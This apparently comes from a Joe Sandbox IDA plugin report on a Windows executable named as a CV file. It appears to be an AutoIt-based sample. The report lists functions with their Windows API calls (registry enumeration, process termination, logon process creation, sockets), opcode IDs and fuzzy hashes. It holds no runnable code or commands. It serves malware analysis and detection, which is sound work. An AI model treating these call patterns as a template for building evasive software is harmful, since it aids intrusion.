                                                                                            • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                                                                            • API String ID: 1038674560-2734436370
                                                                                            • Opcode ID: 439c97c00215113e477a5bef32bc28c59e8cd7e1d446899255eb888cec63de9c
                                                                                            • Instruction ID: 12d5c09b8ad389c26d62fb70fbc8b4259b9d91bb0c3e96c283f94256c26c503a
                                                                                            • Opcode Fuzzy Hash: 439c97c00215113e477a5bef32bc28c59e8cd7e1d446899255eb888cec63de9c
                                                                                            • Instruction Fuzzy Hash: 10213A3120465167D225AB349C1AEFB7398EF65300F60402AF986E71C2EBF19942C3A5
                                                                                            APIs
                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 001009CB
                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 001009F1
                                                                                            • SysAllocString.OLEAUT32(00000000), ref: 001009F4
                                                                                            • SysAllocString.OLEAUT32 ref: 00100A15
                                                                                            • SysFreeString.OLEAUT32 ref: 00100A1E
                                                                                            • StringFromGUID2.OLE32(?,?,00000028), ref: 00100A38
                                                                                            • SysAllocString.OLEAUT32(?), ref: 00100A46
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                             • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                                            • String ID:
                                                                                            • API String ID: 3761583154-0
                                                                                            • Opcode ID: 01ba74cf17f593d18767bbed86c533c73e7f9a0db86a2fd2dd0c3517c84263b6
                                                                                            • Instruction ID: 21efc35959d39f7887d6bca5fff8f8bb39cfa51882fc81ef70b07e47fbaef5e5
                                                                                            • Opcode Fuzzy Hash: 01ba74cf17f593d18767bbed86c533c73e7f9a0db86a2fd2dd0c3517c84263b6
                                                                                            • Instruction Fuzzy Hash: 21216279200204AFDB11DFA8DC88DAA77ECEF4D360B058125F949CB6A1DBB0EC818764
                                                                                            APIs
                                                                                              • Part of subcall function 000DD17C: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 000DD1BA
                                                                                              • Part of subcall function 000DD17C: GetStockObject.GDI32(00000011), ref: 000DD1CE
                                                                                              • Part of subcall function 000DD17C: SendMessageW.USER32(00000000,00000030,00000000), ref: 000DD1D8
                                                                                            • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 0012A32D
                                                                                            • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 0012A33A
                                                                                            • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 0012A345
                                                                                            • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 0012A354
                                                                                            • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 0012A360
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                             • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: MessageSend$CreateObjectStockWindow
                                                                                            • String ID: Msctls_Progress32
                                                                                            • API String ID: 1025951953-3636473452
                                                                                            • Opcode ID: a1955d9bacd981c7b92de594b4deca94b7721855b14f72c2a89a605f07f8371d
                                                                                            • Instruction ID: 7eca6f9f47e87e585a95b60f85492453d06728fc7e2f8fe738a5a7544186fe99
                                                                                            • Opcode Fuzzy Hash: a1955d9bacd981c7b92de594b4deca94b7721855b14f72c2a89a605f07f8371d
                                                                                            • Instruction Fuzzy Hash: F01163B1150229BFEF159FA4DC85EE77F6DFF09798F014115BA08A6060C7729C21DBA4
                                                                                            APIs
                                                                                            • GetClientRect.USER32(?,?), ref: 000DCCF6
                                                                                            • GetWindowRect.USER32(?,?), ref: 000DCD37
                                                                                            • ScreenToClient.USER32(?,?), ref: 000DCD5F
                                                                                            • GetClientRect.USER32(?,?), ref: 000DCE8C
                                                                                            • GetWindowRect.USER32(?,?), ref: 000DCEA5
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                             • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: Rect$Client$Window$Screen
                                                                                            • String ID:
                                                                                            • API String ID: 1296646539-0
                                                                                            • Opcode ID: 33001a4889fca62513945fbf51669465389d7148de74b71afe6a084922d964ca
                                                                                            • Instruction ID: 32583967f4a141f5d6a72d62ca7163150c38ca29187c64f9e969051f6da241eb
                                                                                            • Opcode Fuzzy Hash: 33001a4889fca62513945fbf51669465389d7148de74b71afe6a084922d964ca
                                                                                            • Instruction Fuzzy Hash: 50B10979A0034ADBDF14CFA8C580BEDBBB1FF08350F14952AEC59AB254DB70A950DB64
                                                                                            APIs
                                                                                            • CreateToolhelp32Snapshot.KERNEL32 ref: 00121C18
                                                                                            • Process32FirstW.KERNEL32(00000000,?), ref: 00121C26
                                                                                            • __wsplitpath.LIBCMT ref: 00121C54
                                                                                              • Part of subcall function 000E1DFC: __wsplitpath_helper.LIBCMT ref: 000E1E3C
                                                                                            • _wcscat.LIBCMT ref: 00121C69
                                                                                            • Process32NextW.KERNEL32(00000000,?), ref: 00121CDF
                                                                                            • CloseHandle.KERNEL32(00000000,?,?,00000002,00000000), ref: 00121CF1
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                             • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wsplitpath__wsplitpath_helper_wcscat
                                                                                            • String ID:
                                                                                            • API String ID: 1380811348-0
                                                                                            • Opcode ID: b2ba6bcb4ac9b25d7023cd9bc7ca3edc2236a1a87d7e3372ac17c8586f731fed
                                                                                            • Instruction ID: 9f1b556aa24edff3c72da5e6d63433a7fddf1f48da79157fef74d8aeb28f402e
                                                                                            • Opcode Fuzzy Hash: b2ba6bcb4ac9b25d7023cd9bc7ca3edc2236a1a87d7e3372ac17c8586f731fed
                                                                                            • Instruction Fuzzy Hash: CB516D71104340AFD720EF64D885EAFB7E8EF88754F00492EF58997252EB70DA55CBA2
                                                                                            APIs
                                                                                              • Part of subcall function 00123C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00122BB5,?,?), ref: 00123C1D
                                                                                            • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 001230AF
                                                                                            • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 001230EF
                                                                                            • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 00123112
                                                                                            • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 0012313B
                                                                                            • RegCloseKey.ADVAPI32(?,?,00000000), ref: 0012317E
                                                                                            • RegCloseKey.ADVAPI32(00000000), ref: 0012318B
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                             • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue
                                                                                            • String ID:
                                                                                            • API String ID: 3451389628-0
                                                                                            • Opcode ID: b1f8fff73b4be842c3a69defb192c977896c6541c1e9dad4dfbac259b7b91e58
                                                                                            • Instruction ID: 355b6b4f1b3d49ffff908e40d6ed3a535481e67eff4c8d106072fb77b8be2e3d
                                                                                            • Opcode Fuzzy Hash: b1f8fff73b4be842c3a69defb192c977896c6541c1e9dad4dfbac259b7b91e58
                                                                                            • Instruction Fuzzy Hash: B2516831208300AFD704EF64D895EAEBBE9FF89300F04491DF595872A2DB75EA15CB52
                                                                                            APIs
                                                                                            • GetMenu.USER32(?), ref: 00128540
                                                                                            • GetMenuItemCount.USER32(00000000), ref: 00128577
                                                                                            • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 0012859F
                                                                                            • GetMenuItemID.USER32(?,?), ref: 0012860E
                                                                                            • GetSubMenu.USER32(?,?), ref: 0012861C
                                                                                            • PostMessageW.USER32(?,00000111,?,00000000), ref: 0012866D
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            APIs
                                                                                            • _memset.LIBCMT ref: 00104B10
                                                                                            • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00104B5B
                                                                                            • IsMenu.USER32(00000000), ref: 00104B7B
                                                                                            • CreatePopupMenu.USER32 ref: 00104BAF
                                                                                            • GetMenuItemCount.USER32(000000FF), ref: 00104C0D
                                                                                            • InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 00104C3E
                                                                                            APIs
                                                                                            • select.WSOCK32(00000000,00000001,00000000,00000000,?), ref: 00118E7C
                                                                                            • WSAGetLastError.WSOCK32(00000000), ref: 00118E89
                                                                                            • __WSAFDIsSet.WSOCK32(00000000,00000001), ref: 00118EAD
                                                                                            • #16.WSOCK32(?,?,00000000,00000000), ref: 00118EC5
                                                                                            • _strlen.LIBCMT ref: 00118EF7
                                                                                            • WSAGetLastError.WSOCK32(00000000), ref: 00118F6A
                                                                                            APIs
                                                                                              • Part of subcall function 000DB34E: GetWindowLongW.USER32(?,000000EB), ref: 000DB35F
                                                                                            • BeginPaint.USER32(?,?,?), ref: 000DAC2A
                                                                                            • GetWindowRect.USER32(?,?), ref: 000DAC8E
                                                                                            • ScreenToClient.USER32(?,?), ref: 000DACAB
                                                                                            • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 000DACBC
                                                                                            • EndPaint.USER32(?,?,?,?,?), ref: 000DAD06
                                                                                            • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 0013E673
                                                                                            APIs
                                                                                            • ShowWindow.USER32(00181628,00000000,00181628,00000000,00000000,00181628,?,0013DC5D,00000000,?,00000000,00000000,00000000,?,0013DAD1,00000004), ref: 0012E40B
                                                                                            • EnableWindow.USER32(00000000,00000000), ref: 0012E42F
                                                                                            • ShowWindow.USER32(00181628,00000000), ref: 0012E48F
                                                                                            • ShowWindow.USER32(00000000,00000004), ref: 0012E4A1
                                                                                            • EnableWindow.USER32(00000000,00000001), ref: 0012E4C5
                                                                                            • SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 0012E4E8
                                                                                            APIs
                                                                                            • InterlockedExchange.KERNEL32(?,000001F5), ref: 001098D1
                                                                                              • Part of subcall function 000DF4EA: std::exception::exception.LIBCMT ref: 000DF51E
                                                                                              • Part of subcall function 000DF4EA: __CxxThrowException@8.LIBCMT ref: 000DF533
                                                                                            • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 00109908
                                                                                            • EnterCriticalSection.KERNEL32(?), ref: 00109924
                                                                                            • LeaveCriticalSection.KERNEL32(?), ref: 0010999E
                                                                                            • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 001099B3
                                                                                            • InterlockedExchange.KERNEL32(?,000001F6), ref: 001099D2
                                                                                            APIs
                                                                                            • GetForegroundWindow.USER32(?,?,?,?,?,?,001177F4,?,?,00000000,00000001), ref: 00119B53
                                                                                              • Part of subcall function 00116544: GetWindowRect.USER32(?,?), ref: 00116557
                                                                                            • GetDesktopWindow.USER32 ref: 00119B7D
                                                                                            • GetWindowRect.USER32(00000000), ref: 00119B84
                                                                                            • mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 00119BB6
                                                                                              • Part of subcall function 00107A58: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00107AD0
                                                                                            • GetCursorPos.USER32(?), ref: 00119BE2
                                                                                            • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00119C44
                                                                                            APIs
                                                                                            • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 000FAFAE
                                                                                            • OpenProcessToken.ADVAPI32(00000000), ref: 000FAFB5
                                                                                            • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 000FAFC4
                                                                                            • CloseHandle.KERNEL32(00000004), ref: 000FAFCF
                                                                                            • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 000FAFFE
                                                                                            • DestroyEnvironmentBlock.USERENV(00000000), ref: 000FB012
                                                                                            APIs
                                                                                              • Part of subcall function 000DAF83: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 000DAFE3
                                                                                              • Part of subcall function 000DAF83: SelectObject.GDI32(?,00000000), ref: 000DAFF2
                                                                                              • Part of subcall function 000DAF83: BeginPath.GDI32(?), ref: 000DB009
                                                                                              • Part of subcall function 000DAF83: SelectObject.GDI32(?,00000000), ref: 000DB033
                                                                                            • MoveToEx.GDI32(00000000,-00000002,?,00000000), ref: 0012EC20
                                                                                            • LineTo.GDI32(00000000,00000003,?), ref: 0012EC34
                                                                                            • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 0012EC42
                                                                                            • LineTo.GDI32(00000000,00000000,?), ref: 0012EC52
                                                                                            • EndPath.GDI32(00000000), ref: 0012EC62
                                                                                            • StrokePath.GDI32(00000000), ref: 0012EC72
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                                                                                            • String ID:
                                                                                            • API String ID: 43455801-0
                                                                                            APIs
                                                                                            • GetDC.USER32(00000000), ref: 000FE1C0
                                                                                            • GetDeviceCaps.GDI32(00000000,00000058), ref: 000FE1D1
                                                                                            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 000FE1D8
                                                                                            • ReleaseDC.USER32(00000000,00000000), ref: 000FE1E0
                                                                                            • MulDiv.KERNEL32(000009EC,?,00000000), ref: 000FE1F7
                                                                                            • MulDiv.KERNEL32(000009EC,?,?), ref: 000FE209
                                                                                              • Part of subcall function 000F9AA3: RaiseException.KERNEL32(-C0000018,00000001,00000000,00000000,000F9A05,00000000,00000000,?,000F9DDB), ref: 000FA53A
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: CapsDevice$ExceptionRaiseRelease
                                                                                            • String ID:
                                                                                            • API String ID: 603618608-0
                                                                                            APIs
                                                                                            • __init_pointers.LIBCMT ref: 000E7B47
                                                                                              • Part of subcall function 000E123A: __initp_misc_winsig.LIBCMT ref: 000E125E
                                                                                              • Part of subcall function 000E123A: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 000E7F51
                                                                                              • Part of subcall function 000E123A: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 000E7F65
                                                                                              • Part of subcall function 000E123A: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 000E7F78
                                                                                              • Part of subcall function 000E123A: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 000E7F8B
                                                                                              • Part of subcall function 000E123A: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 000E7F9E
                                                                                              • Part of subcall function 000E123A: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 000E7FB1
                                                                                              • Part of subcall function 000E123A: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 000E7FC4
                                                                                              • Part of subcall function 000E123A: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 000E7FD7
                                                                                              • Part of subcall function 000E123A: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 000E7FEA
                                                                                              • Part of subcall function 000E123A: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 000E7FFD
                                                                                              • Part of subcall function 000E123A: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 000E8010
                                                                                              • Part of subcall function 000E123A: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 000E8023
                                                                                              • Part of subcall function 000E123A: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 000E8036
                                                                                              • Part of subcall function 000E123A: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 000E8049
                                                                                              • Part of subcall function 000E123A: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 000E805C
                                                                                              • Part of subcall function 000E123A: GetProcAddress.KERNEL32(00000000,FlushProcessWriteBuffers), ref: 000E806F
                                                                                            • __mtinitlocks.LIBCMT ref: 000E7B4C
                                                                                              • Part of subcall function 000E7E23: InitializeCriticalSectionAndSpinCount.KERNEL32(0017AC68,00000FA0,?,?,000E7B51,000E5E77,00176C70,00000014), ref: 000E7E41
                                                                                            • __mtterm.LIBCMT ref: 000E7B55
                                                                                              • Part of subcall function 000E7BBD: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,000E7B5A,000E5E77,00176C70,00000014), ref: 000E7D3F
                                                                                              • Part of subcall function 000E7BBD: _free.LIBCMT ref: 000E7D46
                                                                                              • Part of subcall function 000E7BBD: DeleteCriticalSection.KERNEL32(0017AC68,?,?,000E7B5A,000E5E77,00176C70,00000014), ref: 000E7D68
                                                                                            • __calloc_crt.LIBCMT ref: 000E7B7A
                                                                                            • GetCurrentThreadId.KERNEL32 ref: 000E7BA3
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: AddressProc$CriticalSection$Delete$CountCurrentHandleInitializeModuleSpinThread__calloc_crt__init_pointers__initp_misc_winsig__mtinitlocks__mtterm_free
                                                                                            • String ID:
                                                                                            • API String ID: 2942034483-0
                                                                                            APIs
                                                                                            • MapVirtualKeyW.USER32(0000005B,00000000), ref: 000C281D
                                                                                            • MapVirtualKeyW.USER32(00000010,00000000), ref: 000C2825
                                                                                            • MapVirtualKeyW.USER32(000000A0,00000000), ref: 000C2830
                                                                                            • MapVirtualKeyW.USER32(000000A1,00000000), ref: 000C283B
                                                                                            • MapVirtualKeyW.USER32(00000011,00000000), ref: 000C2843
                                                                                            • MapVirtualKeyW.USER32(00000012,00000000), ref: 000C284B
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: Virtual
                                                                                            • String ID:
                                                                                            • API String ID: 4278518827-0
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: CriticalExchangeInterlockedSection$EnterLeaveObjectSingleTerminateThreadWait
                                                                                            • String ID:
                                                                                            • API String ID: 1423608774-0
                                                                                            APIs
                                                                                            • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00107C07
                                                                                            • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 00107C1D
                                                                                            • GetWindowThreadProcessId.USER32(?,?), ref: 00107C2C
                                                                                            • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00107C3B
                                                                                            • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00107C45
                                                                                            • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00107C4C
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                                                            • String ID:
                                                                                            • API String ID: 839392675-0
                                                                                            APIs
                                                                                            • InterlockedExchange.KERNEL32(?,?), ref: 00109A33
                                                                                            • EnterCriticalSection.KERNEL32(?,?,?,?,00135DEE,?,?,?,?,?,000CED63), ref: 00109A44
                                                                                            • TerminateThread.KERNEL32(?,000001F6,?,?,?,00135DEE,?,?,?,?,?,000CED63), ref: 00109A51
                                                                                            • WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,00135DEE,?,?,?,?,?,000CED63), ref: 00109A5E
                                                                                              • Part of subcall function 001093D1: CloseHandle.KERNEL32(?,?,00109A6B,?,?,?,00135DEE,?,?,?,?,?,000CED63), ref: 001093DB
                                                                                            • InterlockedExchange.KERNEL32(?,000001F6), ref: 00109A71
                                                                                            • LeaveCriticalSection.KERNEL32(?,?,?,?,00135DEE,?,?,?,?,?,000CED63), ref: 00109A78
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                                                            • String ID:
                                                                                            • API String ID: 3495660284-0
                                                                                            APIs
                                                                                              • Part of subcall function 000DF4EA: std::exception::exception.LIBCMT ref: 000DF51E
                                                                                              • Part of subcall function 000DF4EA: __CxxThrowException@8.LIBCMT ref: 000DF533
                                                                                            • __swprintf.LIBCMT ref: 000C1EA6
                                                                                            Strings
